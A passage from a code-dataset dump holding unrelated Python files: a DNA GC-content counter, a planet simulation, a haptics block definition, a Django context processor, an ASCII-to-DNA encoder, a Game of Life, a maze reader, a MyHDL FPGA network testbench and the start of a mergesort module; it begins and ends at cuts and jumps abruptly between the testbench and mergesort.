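                if base in counts:
                    counts[base] += 1
    total = sum(counts.values())
    return 100.0 * (counts['G'] + counts['C']) / total if total else 0.0

# usage: gc_content('CD11b.fa') -> percent G+C among counted bases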
Algae(self.parent,self,location=location,velocity=velocity,image='algae.png')\n\n if moverName == 'Tree':\n mover = Tree(self.parent,self,location=location,velocity=velocity,image='tree.png')\n \n if moverName == 'Animal':\n mover = Animal(self.parent,self,location=location,velocity=velocity,image='animal.png')\n\n self.objects.append(mover)\n\n def run(self):\n\n self.objects = [m for m in self.objects if not m.isDead()]\n self.satellite = 0\n for m in self.objects:\n if type(m) == type(Satellite(self.parent,self)):\n self.satellite += 1\n m.run()\n m.applyForce(Gravity.getForce(m.location,self.planet.location))\n\n for m2 in self.objects:\n if m == m2:\n continue\n if m.isCollide() or m2.isCollide():\n continue\n if m.isCollide(m2):\n m.explosion()\n m2.explosion()\n\n self.planet.run()\n\n self.update()\n\n self.output()\n\n def update(self):\n self.info[0][1] = self.planet.temperature\n self.info[1][1] = self.planet.atmosphere\n self.info[2][1] = self.planet.water\n self.info[3][1] = self.planet.co2\n self.info[4][1] = self.planet.oxygen\n self.info[5][1] = self.satellite\n self.info[6][1] = self.planet.mine\n self.info[7][1] = self.planet.nuclear\n self.info[8][1] = self.planet.algae\n self.info[9][1] = self.planet.tree\n self.info[10][1] = self.planet.animal\n\n\n def output(self):\n\n margin = 0\n length = len(self.message)\n\n for i in range(length-1,-1,-1):\n margin = self.height-100-(length-i)*50\n text = self.message[i][0]\n cnt = self.message[i][1]\n\n if cnt > 112:\n color = QColor(255,255,255,(128-cnt)*16)\n elif cnt < 16:\n color = QColor(255,255,255,cnt*16)\n else:\n color = QColor(255,255,255)\n\n pen = QColor(color)\n font = QFont('Consolas',15)\n\n qp = QPainter()\n qp.begin(self.parent)\n qp.setPen(pen)\n qp.setFont(font)\n qp.drawText(50,margin,text)\n qp.end()\n\n if cnt == 0:\n self.message.pop(i)\n else:\n self.message[i][1] -= 1\n\n def getInfo(self,id):\n if id >= 8:\n return self.planet.getAmount(self.info[id][1])\n if id >= 5:\n return str(self.info[id][1])\n if id >= 2:\n return self.planet.getAmount(self.info[id][1])\n return self.planet.getStatus(self.info[id][1])\n \n\n \n","sub_path":"world.py","file_name":"world.py","file_ext":"py","file_size_in_byte":4548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"126485030","text":"from pysensationcore import *\nimport sensation_helpers as sh\n\nblock = defineBlock(\"ExtrudedCircle\")\ndefineInputs(block,\n \"objectCentre\",\t\n \"radius\",\n \"extrusionDirection\",\n \"palm_position\",\n \"palm_normal\")\ndefineOutputs(block, \"out\")\n\ndefineBlockInputDefaultValue(block.objectCentre, (0.0,0.2,0))\ndefineBlockInputDefaultValue(block.radius, (0.03,0,0))\ndefineBlockInputDefaultValue(block.palm_position, (0,0.2,0))\ndefineBlockInputDefaultValue(block.palm_normal, (0,0,0))\ndefineBlockInputDefaultValue(block.extrusionDirection, (0.0, 1.0, 0.0))\n\nsetMetaData(block.objectCentre, \"Type\", \"Point\")\nsetMetaData(block.radius, \"Type\", \"Scalar\")\nsetMetaData(block.extrusionDirection, \"Input-Visibility\", False)\nsetMetaData(block.palm_normal, \"Input-Visibility\", False)\nsetMetaData(block.palm_position, \"Input-Visibility\", False)\n\ncircle = createInstance(\"CirclePath\", \"circlePath\")\nconnect(block.radius, circle.radius)\n\n# Transform from Virtual Space to Emitter space\ntransformInstance = createInstance(\"ComposeTransform\", \"transformInstance\")\nconnect(Constant((1, 0, 0)), transformInstance.x)\nconnect(Constant((0, 0, 1)), 
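# Illustrative sketch: addObject in world.py above dispatches on moverName
# through nine near-identical if/elif branches. A name -> (class, image)
# table keeps a single construction site; Mover here is a hypothetical
# stand-in for the element classes the record imports:
class Mover:
    def __init__(self, parent, world, location=None, velocity=None, image=None):
        self.parent, self.world = parent, world
        self.location, self.velocity, self.image = location, velocity, image

MOVERS = {
    'Fire': (Mover, 'red.png'),       'Ice': (Mover, 'blue.png'),
    'Dry Ice': (Mover, 'purple.png'), 'Satellite': (Mover, 'satellite.png'),
    'Mine': (Mover, 'mine.png'),      'Nuclear': (Mover, 'nuclear.png'),
    'Algae': (Mover, 'algae.png'),    'Tree': (Mover, 'tree.png'),
    'Animal': (Mover, 'animal.png'),
}

def make_mover(name, parent, world, location, velocity):
    cls, image = MOVERS[name]
    return cls(parent, world, location=location, velocity=velocity, image=image)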
transformInstance.y)\nconnect(Constant((0, 1, 0)), transformInstance.z)\nconnect(block.objectCentre, transformInstance.o)\n\ntransformPathInstance = createInstance(\"TransformPath\", \"transformPathInstance\")\nconnect(transformInstance.out, transformPathInstance.transform)\nconnect(circle.out, transformPathInstance.path)\n\nprojectedPath = createInstance(\"ProjectPathOntoPlane\", \"projectedPath\")\nconnect(transformPathInstance.out, projectedPath.path)\nconnect(block.extrusionDirection, projectedPath.projectionDirection)\nconnect(block.palm_position, projectedPath.planePoint)\nconnect(block.palm_normal, projectedPath.planeNormal)\n\nfocalPoints = sh.createVirtualToPhysicalFocalPointPipeline(block,\n projectedPath.out,\n renderMode=sh.RenderMode.Loop,\n drawFrequency = 70)\n\nevalOnlyIfIntersecting = createInstance(\"Comparator\", \"evalOnlyIfIntersecting\")\nconnect(projectedPath.valid, evalOnlyIfIntersecting.a)\nconnect(Constant((1,0,0)), evalOnlyIfIntersecting.b)\nconnect(Constant((0,0,0,0)), evalOnlyIfIntersecting.returnValueIfAGreaterThanB)\nconnect(focalPoints, evalOnlyIfIntersecting.returnValueIfAEqualsB)\nconnect(Constant((0,0,0,0)), evalOnlyIfIntersecting.returnValueIfALessThanB)\nconnect(evalOnlyIfIntersecting.out, block.out)\n","sub_path":"Data_Vis_mrtk/Assets/StreamingAssets/Python/BlockLibraries/UnityExamples/ExtrudedCircleSensation.py","file_name":"ExtrudedCircleSensation.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"303427804","text":"\"\"\"\nsettings_context_processor.py\n\nUse this file to define values from the settings and local_settings files to be used in templates\n\n\"\"\"\n__author__ = 'mark'\n\nfrom django.conf import settings as django_settings\nfrom django.core.exceptions import ImproperlyConfigured\n\ndef config_settings(request):\n config_dict = {\n }\n\n return config_dict\n\n\ndef settings(request):\n \"\"\"\n Adds the settings specified in settings.TEMPLATE_VISIBLE_SETTINGS to\n the request context.\n Add the names of any parameters specified in settings.py to\n TEMPLATE_VISIBLE_SETTINGS.\n Variables must be defined before being referenced in TEMPLATE_VISIBLE_SETTINGS\n These values can then be used in templates using {{ VARIABLE }}.\n \"\"\"\n new_settings = {}\n #print django_settings.TEMPLATE_VISIBLE_SETTINGS\n for attr in getattr(django_settings, \"TEMPLATE_VISIBLE_SETTINGS\", ()):\n try:\n new_settings[attr] = getattr(django_settings, attr)\n except AttributeError:\n m = \"TEMPLATE_VISIBLE_SETTINGS: '{0}' does not exist\".format(attr)\n raise ImproperlyConfigured(m);\n return new_settings","sub_path":"bbp/bbp/settings_context_processor.py","file_name":"settings_context_processor.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"299778604","text":"\n# ASCII string \ninp_text = input(\"Enter a string of ASCII characters:\")\n# list of ascii values of each char in string\nascii_list = []\n# Binary numbers converted to strings\nbinary_list = []\n# ascii list encoded to DNA characters\nencoded_list = []\n# Dict to hold DNA constants\ndna_const = {'00':'A', '01':'T', '10':'G', '11':'C'}\n\n# function to convert binary numbers into DNA encoded value\ndef encode_bin(bin_string):\n bin_string = bin_string[2:]\n while len(bin_string) < 8:\n bin_string = '0' + bin_string\n bin_list = []\n for i in range(4):\n bin_list.append(bin_string[:2])\n bin_string = 
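# Illustrative sketch: settings_context_processor.py above mirrors every name
# listed in TEMPLATE_VISIBLE_SETTINGS into the template context. Typical
# wiring (module path and values are assumptions, shown as comments only):
#
#   # settings.py
#   SITE_NAME = 'bbp'
#   TEMPLATE_VISIBLE_SETTINGS = ('SITE_NAME', 'DEBUG')
#   # ...with 'bbp.settings_context_processor.settings' added to the
#   # template engine's context_processors list
#
#   # any template can then render: {{ SITE_NAME }}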
bin_string[2:]\n for item in bin_list:\n if item == '00':\n encoded_list.append('A')\n elif item == '01':\n encoded_list.append('T')\n elif item == '10':\n encoded_list.append('G')\n else:\n encoded_list.append('C')\n\n\n # print(bin_list)\n\n \n\n# To convert the string to ascii/binary (if binary is needed)\ndef convert_ascii(ascii_string):\n for char in ascii_string:\n ascii_list.append(ord(char))\n for item in ascii_list:\n binary_list.append(str(bin(item)))\n for item in binary_list:\n encode_bin(item)\n\nconvert_ascii(inp_text) \n# print (ascii_list)\n# print (binary_list)\n# print (encoded_list)\n\nencoded_string = \"\"\nfor item in encoded_list:\n encoded_string = encoded_string + item\n\nprint(encoded_string)\n\n","sub_path":"algos/ascii_dna.py","file_name":"ascii_dna.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"529150732","text":"import pyglet\nfrom pyglet.gl import *\nfrom random import *\n\nwindow = pyglet.window.Window(1024,768)\n\n#colors (pairs of 3)\nsquare_white = (255,255,255,255,255,255,255,255,255,255,255,255)\nsquare_black = (0,0,0,0,0,0,0,0,0,0,0,0)\n\nsize = 50\ntiles = [[0 for col in range(size)] for row in range(size)]\n\nfor i in xrange(0, size):\n\tfor j in xrange(0, size):\n\t\ttiles[i][j] = randint(0,1)\n\ndef get_value(r, c):\n\ttry:\n\t\tr = int(tiles[r][c] or 0)\n\t\treturn r\n\texcept IndexError:\n\t\treturn 0\n\n\ndef add_neighbors(row, col):\n\ttotal = 0\n\n\tneighborValues =[\n\t\t[row-1, col-1],\n\t\t[row-1, col],\n\t\t[row-1, col+1],\n\t\t[row, col-1],\n\t\t[row, col+1],\n\t\t[row+1, col-1],\n\t\t[row+1, col],\n\t\t[row+1, col+1]\n\t]\n\n\tfor item in neighborValues:\n\t\ttotal += get_value(item[0], item[1])\n\n\treturn total\n\n\ndef game_of_life(t, state):\n\t# is currently alive\n\tif state == 1: \n\t\t# any live cell with fewer than two live neighbors dies - under-population\n\t\tif t < 2: \n\t\t\treturn 0\n\t\t# any live cell with two or three live neighbors lives on to the next generation\n\t\tif t == 2 or t == 3: \n\t\t\treturn 1\n\t\t# any live cell with more than three live neighbors dies - overcrowding\n\t\tif t > 3: \n\t\t\treturn 0\n\t#is currently dead\n\telse: \n\t\t# any dead cell with exactly three live neighbors becomes a live cell - reproduction\n\t\tif t == 3: \n\t\t\treturn 1\n\t\telse:\n\t\t\treturn 0\n\n\ndef update(dt):\n\tupdateList = []\n\tfor row in xrange(0, size):\n\t\tfor col in xrange(0, size):\n\t\t\ttotal = add_neighbors(row, col)\n\t\t\tresult = game_of_life(total, tiles[row][col])\n\t\t\tif result != tiles[row][col]:\n\t\t\t\tupdateList.append([row, col])\n\n\tfor item in updateList:\n\t\tif tiles[item[0]][item[1]] == 1:\n\t\t\ttiles[item[0]][item[1]] = 0\n\t\telse:\n\t\t\ttiles[item[0]][item[1]] = 1\n\n\n@window.event\ndef on_draw():\n for row in xrange(0, size):\n \tfor col in xrange(0, size):\n \t\tif tiles[row][col] == 1:\n \t\t\tcolor = square_black\n \t\telse:\n \t\t\tcolor = square_white\n\n \t\t#top left, top right, bottom left, bottom right\n \t\tverts = (col*50, window.height-(row*50), (col*50)+50, window.height-(row*50), \n \t\t\t\t(col*50)+50, window.height-(row*50) - 50, (col*50), window.height-(row*50) - 50) \n \t\tpyglet.graphics.draw(4, pyglet.gl.GL_QUADS,('v2i', verts),('c3B', color))\n\n\n\nif __name__ == \"__main__\":\n\tpyglet.clock.schedule_interval(update, 
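# Illustrative sketch: ascii_dna.py above defines dna_const but re-derives
# the mapping with if/elif chains. The whole encode step collapses to two
# lines using that dict plus format(..., '08b'):
DNA_CONST = {'00': 'A', '01': 'T', '10': 'G', '11': 'C'}

def encode(text):
    bits = ''.join(format(ord(ch), '08b') for ch in text)
    return ''.join(DNA_CONST[bits[i:i + 2]] for i in range(0, len(bits), 2))

assert encode('Hi') == 'TAGATGGT'  # H=01001000 -> TAGA, i=01101001 -> TGGT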
1/1)\n\tpyglet.app.run()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"224305873","text":"WALL_CELL = 0 # Не прохідна клітина лабіринту або його стіна\n\n\ndef readMazeFromFile(aFileName, M):\n # Функція зчитуванння лабіринту з файлу\n maze = [] # Створення порожньої матриці для задавання лабіринту\n\n global WALL_CELL\n\n row0 = [WALL_CELL] * (M + 2) # перший рядок матриці, що визначає верхіню стіну\n maze.append(row0)\n\n # Зчитуванння лабіринту з файлу\n with open(aFileName) as f:\n for str_row in f:\n row = list(map(int, str_row.split())) # Перетворення рядка у список цілих чисел\n\n if len(row) == 0: # Захист від зайвих рядків у кінці файлу\n break\n\n # додавання лівої та правої \"стіни\" лабіринту\n row.insert(0, WALL_CELL)\n row.append(WALL_CELL)\n\n maze.append(row) # додавання рядка до лабіринту\n\n rowLast = [WALL_CELL] * (M + 2) # останній рядок матриці, що визначає нижню стіну\n maze.append(rowLast)\n\n return maze # Повертаємо створений лабіринт\n\ndef showMaze(maze):\n # функція форматованого виведення матриці лабіринту\n for row in maze:\n for el in row:\n print(\"%7s\" % (el,), end=\"\")\n print()\n\n\n\nif __name__ == \"__main__\":\n maze = readMazeFromFile(\"maze1.txt\", 7)\n showMaze(maze)\n\n\n\n\n\n","sub_path":"source/T7_Graphs/P4_Maizes/L1_Read.py","file_name":"L1_Read.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"487148467","text":"#!/usr/bin/env python\n\"\"\"\n\nCopyright (c) 2019 Alex Forencich\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
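# Illustrative sketch: get_value in the game-of-life record above catches
# IndexError for out-of-range cells, but Python's negative indexing never
# raises -- tiles[-1][c] silently reads the last row, so the top and left
# edges wrap while the bottom and right do not. An explicit bounds check
# treats all four edges the same:
def get_value(tiles, r, c):
    size = len(tiles)
    if 0 <= r < size and 0 <= c < size:
        return tiles[r][c]
    return 0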
IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\nTHE SOFTWARE.\n\n\"\"\"\n\nfrom myhdl import *\nimport os\nimport struct\n\nimport xfcp\nimport uart_ep\nimport i2c\nimport eth_ep\nimport arp_ep\nimport udp_ep\nimport mii_ep\n\nmodule = 'fpga_core'\ntestbench = 'test_%s' % module\n\nsrcs = []\n\nsrcs.append(\"../rtl/%s.v\" % module)\nsrcs.append(\"../lib/xfcp/rtl/xfcp_interface_uart.v\")\nsrcs.append(\"../lib/xfcp/rtl/xfcp_interface_udp.v\")\nsrcs.append(\"../lib/xfcp/rtl/xfcp_mod_i2c_master.v\")\nsrcs.append(\"../lib/xfcp/rtl/xfcp_mod_wb.v\")\nsrcs.append(\"../lib/xfcp/rtl/xfcp_arb.v\")\nsrcs.append(\"../lib/xfcp/rtl/xfcp_switch.v\")\nsrcs.append(\"../lib/i2c/rtl/i2c_master.v\")\nsrcs.append(\"../lib/eth/rtl/ssio_sdr_in.v\")\nsrcs.append(\"../lib/eth/rtl/mii_phy_if.v\")\nsrcs.append(\"../lib/eth/rtl/eth_mac_mii_fifo.v\")\nsrcs.append(\"../lib/eth/rtl/eth_mac_mii.v\")\nsrcs.append(\"../lib/eth/rtl/eth_mac_1g.v\")\nsrcs.append(\"../lib/eth/rtl/axis_gmii_rx.v\")\nsrcs.append(\"../lib/eth/rtl/axis_gmii_tx.v\")\nsrcs.append(\"../lib/eth/rtl/lfsr.v\")\nsrcs.append(\"../lib/eth/rtl/eth_axis_rx.v\")\nsrcs.append(\"../lib/eth/rtl/eth_axis_tx.v\")\nsrcs.append(\"../lib/eth/rtl/udp_complete.v\")\nsrcs.append(\"../lib/eth/rtl/udp_checksum_gen.v\")\nsrcs.append(\"../lib/eth/rtl/udp.v\")\nsrcs.append(\"../lib/eth/rtl/udp_ip_rx.v\")\nsrcs.append(\"../lib/eth/rtl/udp_ip_tx.v\")\nsrcs.append(\"../lib/eth/rtl/ip_complete.v\")\nsrcs.append(\"../lib/eth/rtl/ip.v\")\nsrcs.append(\"../lib/eth/rtl/ip_eth_rx.v\")\nsrcs.append(\"../lib/eth/rtl/ip_eth_tx.v\")\nsrcs.append(\"../lib/eth/rtl/ip_arb_mux.v\")\nsrcs.append(\"../lib/eth/rtl/arp.v\")\nsrcs.append(\"../lib/eth/rtl/arp_cache.v\")\nsrcs.append(\"../lib/eth/rtl/arp_eth_rx.v\")\nsrcs.append(\"../lib/eth/rtl/arp_eth_tx.v\")\nsrcs.append(\"../lib/eth/rtl/eth_arb_mux.v\")\nsrcs.append(\"../lib/uart/rtl/uart.v\")\nsrcs.append(\"../lib/uart/rtl/uart_rx.v\")\nsrcs.append(\"../lib/uart/rtl/uart_tx.v\")\nsrcs.append(\"../lib/wb/rtl/wb_ram.v\")\nsrcs.append(\"../lib/axis/rtl/arbiter.v\")\nsrcs.append(\"../lib/axis/rtl/priority_encoder.v\")\nsrcs.append(\"../lib/axis/rtl/axis_cobs_encode.v\")\nsrcs.append(\"../lib/axis/rtl/axis_cobs_decode.v\")\nsrcs.append(\"../lib/axis/rtl/axis_fifo.v\")\nsrcs.append(\"../lib/axis/rtl/axis_async_fifo.v\")\nsrcs.append(\"../lib/axis/rtl/axis_async_fifo_adapter.v\")\nsrcs.append(\"test_%s.v\" % module)\n\nsrc = ' '.join(srcs)\n\nbuild_cmd = \"iverilog -o %s.vvp %s\" % (testbench, src)\n\ndef bench():\n\n # Parameters\n TARGET = \"SIM\"\n\n # Inputs\n clk = Signal(bool(0))\n rst = Signal(bool(0))\n current_test = Signal(intbv(0)[8:])\n\n btn = Signal(intbv(0)[4:])\n sw = Signal(intbv(0)[4:])\n phy_rx_clk = Signal(bool(0))\n phy_rxd = Signal(intbv(0)[4:])\n phy_rx_dv = Signal(bool(0))\n phy_rx_er = Signal(bool(0))\n phy_col = Signal(bool(0))\n phy_crs = Signal(bool(0))\n uart_rxd = Signal(bool(1))\n\n # Outputs\n led0_r = Signal(bool(0))\n led0_g = Signal(bool(0))\n led0_b = Signal(bool(0))\n led1_r = Signal(bool(0))\n led1_g = Signal(bool(0))\n led1_b = Signal(bool(0))\n led2_r = Signal(bool(0))\n led2_g = Signal(bool(0))\n led2_b = Signal(bool(0))\n led3_r = Signal(bool(0))\n led3_g = Signal(bool(0))\n led3_b = Signal(bool(0))\n led4 = Signal(bool(0))\n led5 = Signal(bool(0))\n led6 = Signal(bool(0))\n led7 = Signal(bool(0))\n phy_tx_clk = 
Signal(bool(0))\n phy_txd = Signal(intbv(0)[4:])\n phy_tx_en = Signal(bool(0))\n phy_reset_n = Signal(bool(0))\n uart_txd = Signal(bool(1))\n\n # sources and sinks\n mii_source = mii_ep.MIISource()\n\n mii_source_logic = mii_source.create_logic(\n phy_rx_clk,\n rst,\n txd=phy_rxd,\n tx_en=phy_rx_dv,\n tx_er=phy_rx_er,\n name='mii_source'\n )\n\n mii_sink = mii_ep.MIISink()\n\n mii_sink_logic = mii_sink.create_logic(\n phy_tx_clk,\n rst,\n rxd=phy_txd,\n rx_dv=phy_tx_en,\n rx_er=False,\n name='mii_sink'\n )\n\n uart_source = uart_ep.UARTSource()\n\n uart_source_logic = uart_source.create_logic(\n clk,\n rst,\n txd=uart_rxd,\n prescale=int(125000000/(115200*8)),\n name='uart_source'\n )\n\n uart_sink = uart_ep.UARTSink()\n\n uart_sink_logic = uart_sink.create_logic(\n clk,\n rst,\n rxd=uart_txd,\n prescale=int(125000000/(115200*8)),\n name='uart_sink'\n )\n\n # DUT\n if os.system(build_cmd):\n raise Exception(\"Error running build command\")\n\n dut = Cosimulation(\n \"vvp -m myhdl %s.vvp -lxt2\" % testbench,\n clk=clk,\n rst=rst,\n current_test=current_test,\n\n btn=btn,\n sw=sw,\n led0_r=led0_r,\n led0_g=led0_g,\n led0_b=led0_b,\n led1_r=led1_r,\n led1_g=led1_g,\n led1_b=led1_b,\n led2_r=led2_r,\n led2_g=led2_g,\n led2_b=led2_b,\n led3_r=led3_r,\n led3_g=led3_g,\n led3_b=led3_b,\n led4=led4,\n led5=led5,\n led6=led6,\n led7=led7,\n\n phy_rx_clk=phy_rx_clk,\n phy_rxd=phy_rxd,\n phy_rx_dv=phy_rx_dv,\n phy_rx_er=phy_rx_er,\n phy_tx_clk=phy_tx_clk,\n phy_txd=phy_txd,\n phy_tx_en=phy_tx_en,\n phy_col=phy_col,\n phy_crs=phy_crs,\n phy_reset_n=phy_reset_n,\n\n uart_rxd=uart_rxd,\n uart_txd=uart_txd\n )\n\n @always(delay(4))\n def clkgen():\n clk.next = not clk\n\n phy_clk_hp = Signal(int(20))\n\n @instance\n def rx_clk_gen():\n while True:\n yield delay(int(phy_clk_hp))\n phy_rx_clk.next = not phy_rx_clk\n phy_tx_clk.next = not phy_tx_clk\n\n @instance\n def check():\n yield delay(100)\n yield clk.posedge\n rst.next = 1\n yield clk.posedge\n rst.next = 0\n yield clk.posedge\n yield delay(100)\n yield clk.posedge\n\n # testbench stimulus\n\n yield clk.posedge\n print(\"test 1: enumerate via UDP\")\n current_test.next = 1\n\n pkt = xfcp.XFCPFrame()\n pkt.path = []\n pkt.rpath = []\n pkt.ptype = 0xfe\n pkt.payload = b''\n\n test_frame = udp_ep.UDPFrame()\n test_frame.eth_dest_mac = 0x020000000000\n test_frame.eth_src_mac = 0xDAD1D2D3D4D5\n test_frame.eth_type = 0x0800\n test_frame.ip_version = 4\n test_frame.ip_ihl = 5\n test_frame.ip_dscp = 0\n test_frame.ip_ecn = 0\n test_frame.ip_length = None\n test_frame.ip_identification = 0\n test_frame.ip_flags = 2\n test_frame.ip_fragment_offset = 0\n test_frame.ip_ttl = 64\n test_frame.ip_protocol = 0x11\n test_frame.ip_header_checksum = None\n test_frame.ip_source_ip = 0xc0a80181\n test_frame.ip_dest_ip = 0xc0a80180\n test_frame.udp_source_port = 1234\n test_frame.udp_dest_port = 14000\n test_frame.payload = pkt.build_axis()\n test_frame.build()\n\n mii_source.send(b'\\x55\\x55\\x55\\x55\\x55\\x55\\x55\\xD5'+test_frame.build_eth().build_axis_fcs().data)\n\n # wait for ARP request packet\n rx_frame = None\n while rx_frame is None:\n yield clk.posedge\n rx_frame = mii_sink.recv()\n\n check_eth_frame = eth_ep.EthFrame()\n check_eth_frame.parse_axis_fcs(rx_frame.data[8:])\n check_frame = arp_ep.ARPFrame()\n check_frame.parse_eth(check_eth_frame)\n\n print(check_frame)\n\n assert check_frame.eth_dest_mac == 0xFFFFFFFFFFFF\n assert check_frame.eth_src_mac == 0x020000000000\n assert check_frame.eth_type == 0x0806\n assert check_frame.arp_htype == 0x0001\n assert 
check_frame.arp_ptype == 0x0800\n assert check_frame.arp_hlen == 6\n assert check_frame.arp_plen == 4\n assert check_frame.arp_oper == 1\n assert check_frame.arp_sha == 0x020000000000\n assert check_frame.arp_spa == 0xc0a80180\n assert check_frame.arp_tha == 0x000000000000\n assert check_frame.arp_tpa == 0xc0a80181\n\n # generate response\n arp_frame = arp_ep.ARPFrame()\n arp_frame.eth_dest_mac = 0x020000000000\n arp_frame.eth_src_mac = 0xDAD1D2D3D4D5\n arp_frame.eth_type = 0x0806\n arp_frame.arp_htype = 0x0001\n arp_frame.arp_ptype = 0x0800\n arp_frame.arp_hlen = 6\n arp_frame.arp_plen = 4\n arp_frame.arp_oper = 2\n arp_frame.arp_sha = 0xDAD1D2D3D4D5\n arp_frame.arp_spa = 0xc0a80181\n arp_frame.arp_tha = 0x020000000000\n arp_frame.arp_tpa = 0xc0a80180\n\n mii_source.send(b'\\x55\\x55\\x55\\x55\\x55\\x55\\x55\\xD5'+arp_frame.build_eth().build_axis_fcs().data)\n\n rx_frame = None\n while rx_frame is None:\n yield clk.posedge\n rx_frame = mii_sink.recv()\n\n check_eth_frame = eth_ep.EthFrame()\n check_eth_frame.parse_axis_fcs(rx_frame.data[8:])\n check_frame = udp_ep.UDPFrame()\n check_frame.parse_eth(check_eth_frame)\n\n print(check_frame)\n\n assert check_frame.eth_dest_mac == 0xDAD1D2D3D4D5\n assert check_frame.eth_src_mac == 0x020000000000\n assert check_frame.eth_type == 0x0800\n assert check_frame.ip_version == 4\n assert check_frame.ip_ihl == 5\n assert check_frame.ip_dscp == 0\n assert check_frame.ip_ecn == 0\n assert check_frame.ip_identification == 0\n assert check_frame.ip_flags == 2\n assert check_frame.ip_fragment_offset == 0\n assert check_frame.ip_ttl == 64\n assert check_frame.ip_protocol == 0x11\n assert check_frame.ip_source_ip == 0xc0a80180\n assert check_frame.ip_dest_ip == 0xc0a80181\n assert check_frame.udp_source_port == 14000\n assert check_frame.udp_dest_port == 1234\n\n rx_pkt = xfcp.XFCPFrame()\n rx_pkt.parse_axis(check_frame.payload.data)\n\n print(rx_pkt)\n\n assert rx_pkt.ptype == 0xff\n assert rx_pkt.path == []\n assert rx_pkt.rpath == []\n assert len(rx_pkt.payload.data) == 64\n\n pkt = xfcp.XFCPFrame()\n pkt.path = [0]\n pkt.rpath = []\n pkt.ptype = 0xfe\n pkt.payload = b''\n\n test_frame = udp_ep.UDPFrame()\n test_frame.eth_dest_mac = 0x020000000000\n test_frame.eth_src_mac = 0xDAD1D2D3D4D5\n test_frame.eth_type = 0x0800\n test_frame.ip_version = 4\n test_frame.ip_ihl = 5\n test_frame.ip_dscp = 0\n test_frame.ip_ecn = 0\n test_frame.ip_length = None\n test_frame.ip_identification = 0\n test_frame.ip_flags = 2\n test_frame.ip_fragment_offset = 0\n test_frame.ip_ttl = 64\n test_frame.ip_protocol = 0x11\n test_frame.ip_header_checksum = None\n test_frame.ip_source_ip = 0xc0a80181\n test_frame.ip_dest_ip = 0xc0a80180\n test_frame.udp_source_port = 1234\n test_frame.udp_dest_port = 14000\n test_frame.payload = pkt.build_axis()\n test_frame.build()\n\n mii_source.send(b'\\x55\\x55\\x55\\x55\\x55\\x55\\x55\\xD5'+test_frame.build_eth().build_axis_fcs().data)\n\n rx_frame = None\n while rx_frame is None:\n yield clk.posedge\n rx_frame = mii_sink.recv()\n\n check_eth_frame = eth_ep.EthFrame()\n check_eth_frame.parse_axis_fcs(rx_frame.data[8:])\n check_frame = udp_ep.UDPFrame()\n check_frame.parse_eth(check_eth_frame)\n\n print(check_frame)\n\n assert check_frame.eth_dest_mac == 0xDAD1D2D3D4D5\n assert check_frame.eth_src_mac == 0x020000000000\n assert check_frame.eth_type == 0x0800\n assert check_frame.ip_version == 4\n assert check_frame.ip_ihl == 5\n assert check_frame.ip_dscp == 0\n assert check_frame.ip_ecn == 0\n assert check_frame.ip_identification == 0\n assert 
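# Illustrative sketch: the testbench above repeats long runs of
# field-by-field asserts on each decoded frame. A hypothetical helper (plain
# Python, independent of MyHDL) shrinks each block to one call:
def assert_fields(frame, **expected):
    for name, want in expected.items():
        got = getattr(frame, name)
        assert got == want, '%s: %r != %r' % (name, got, want)

# usage sketch:
# assert_fields(check_frame, eth_type=0x0800, ip_ttl=64, udp_dest_port=1234)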
check_frame.ip_flags == 2\n assert check_frame.ip_fragment_offset == 0\n assert check_frame.ip_ttl == 64\n assert check_frame.ip_protocol == 0x11\n assert check_frame.ip_source_ip == 0xc0a80180\n assert check_frame.ip_dest_ip == 0xc0a80181\n assert check_frame.udp_source_port == 14000\n assert check_frame.udp_dest_port == 1234\n\n rx_pkt = xfcp.XFCPFrame()\n rx_pkt.parse_axis(check_frame.payload.data)\n\n print(rx_pkt)\n\n assert rx_pkt.ptype == 0xff\n assert rx_pkt.path == [0]\n assert rx_pkt.rpath == []\n assert len(rx_pkt.payload.data) == 32\n\n assert mii_source.empty()\n assert mii_sink.empty()\n\n yield delay(100)\n\n yield clk.posedge\n print(\"test 1: test write and read RAM 0\")\n current_test.next = 1\n\n pkt1 = xfcp.XFCPFrame()\n pkt1.path = [0]\n pkt1.ptype = 0x12\n pkt1.payload = bytearray(struct.pack(' your_unsorted_list becomes sorted in ascending order\n \n 2nd way * Make one or more lists to main()\n * Assign them to mergesort // mergesort(your_unsorted_list)\n --> your_unsorted_list becomes sorted in ascending order\n\nChange log:\n 1.1.0 Added exception handler to ensure list only contains integers or floats\n 1.1.1 Edited author notes and made some code layout standardizing\n'''\n\ndef mergesort(my_list):\n \n # Exception handler to ensure list only contains integers or floats\n try:\n for element in my_list:\n if(not element == float(element)):\n raise ValueError\n except ValueError:\n print(\"\\nFunction mergesort only accepts lists consisting of integers or floats\\nSorting was unsuccessful!\\n\")\n else:\n split(my_list)\n\n# Splits my_list to sorted 